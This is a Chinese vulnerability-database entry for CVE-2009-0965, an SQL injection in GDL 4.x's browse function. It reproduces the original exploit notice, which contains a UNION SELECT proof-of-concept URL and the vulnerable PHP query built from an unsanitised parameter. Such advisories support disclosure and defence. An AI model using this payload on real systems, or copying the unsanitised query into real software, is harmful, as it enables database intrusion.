GDL 'functions/browse.ph' SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117483 漏洞类型 SQL注入
发布时间 2009-03-17 更新时间 2009-04-01
CVE编号 CVE-2009-0965 CNNVD-ID CNNVD-200903-322
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/8228
https://cxsecurity.com/issue/WLB-2009030190
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200903-322
|漏洞详情
GaneshaDigitalLibrary(GDL)4.0版本和4.2版本的functions/browse.php中存在SQL注入漏洞。远程攻击者可以借助对gdl.php的一个浏览操作中的节点参数,执行任意SQL指令。
|漏洞EXP
*******************************************************************************************
   [ Discovered by g4t3w4y \ jkthackerlink[at]gmail.com ]
   [ transitory only http://jakartaweb.net/home/GDL-Digital-Library-SQL-Injection-Vulnerability.html :) ]
 ###################################################
 #  [ GDL v.4.x ]    SQL Injection Vulnerability   #
 ###################################################
 #
 # Script:
 # GDL 4.0 | htdocs .gz
 # GDL 4.0 | windows application
 # GDL 4.2 | htdocs .zip
 #
 # Script site: http://kmrg.itb.ac.id
 # Download: http://kmrg.itb.ac.id
 #
 # [SQL] Vuln : http://localhost/gdl.php?mod=browse&node=0+AND+1=2+UNION+SELECT+0,1,2--
 #
 # Bug: ./functions/browse.php (line: 286-311)
 #
 # function browse_child_list($node)
 # {
 #     $strsql = "SELECT folder.*, folder_tree.NODE
 #                FROM folder, folder_tree
 #                WHERE
 #                    folder_tree.PARENT = '$node' AND
 #                    folder_tree.NODE = folder.NODE ";
 #   
 #     $dbres = mysql_query($strsql);               
 #
 #    if ($dbres){
 #            while ($row = mysql_fetch_array($dbres)){                  //  SQL inj
 #            $html .= browse_folder_print($row,2);
 #        }       
 #
 #         if (!empty($html)){
 #             $box_html = "<table cellSpacing=0 cellPadding=2 border=0>$html</table>";
 #             return $box_html;
 #         } else {
 #             return NULL;
 #         }   
 #     } else {
 #         stdout_error(mysql_error());
 #         return NULL;
 #     }
 # }
 ##################################################
 # Greetz: cozmaster * E-C-H-O Team * and otherz..           #
 ##################################################

 [ g4t3w4y / 2009 ]

*******************************************************************************************

# milw0rm.com [2009-03-17]
|参考资料

来源:XF
名称:gdl-node-sql-injection(49292)
链接:http://xforce.iss.net/xforce/xfdb/49292
来源:VUPEN
名称:ADV-2009-0751
链接:http://www.vupen.com/english/advisories/2009/0751
来源:BID
名称:34144
链接:http://www.securityfocus.com/bid/34144
来源:MILW0RM
名称:8228
链接:http://www.milw0rm.com/exploits/8228
来源:OSVDB
名称:52803
链接:http://osvdb.org/52803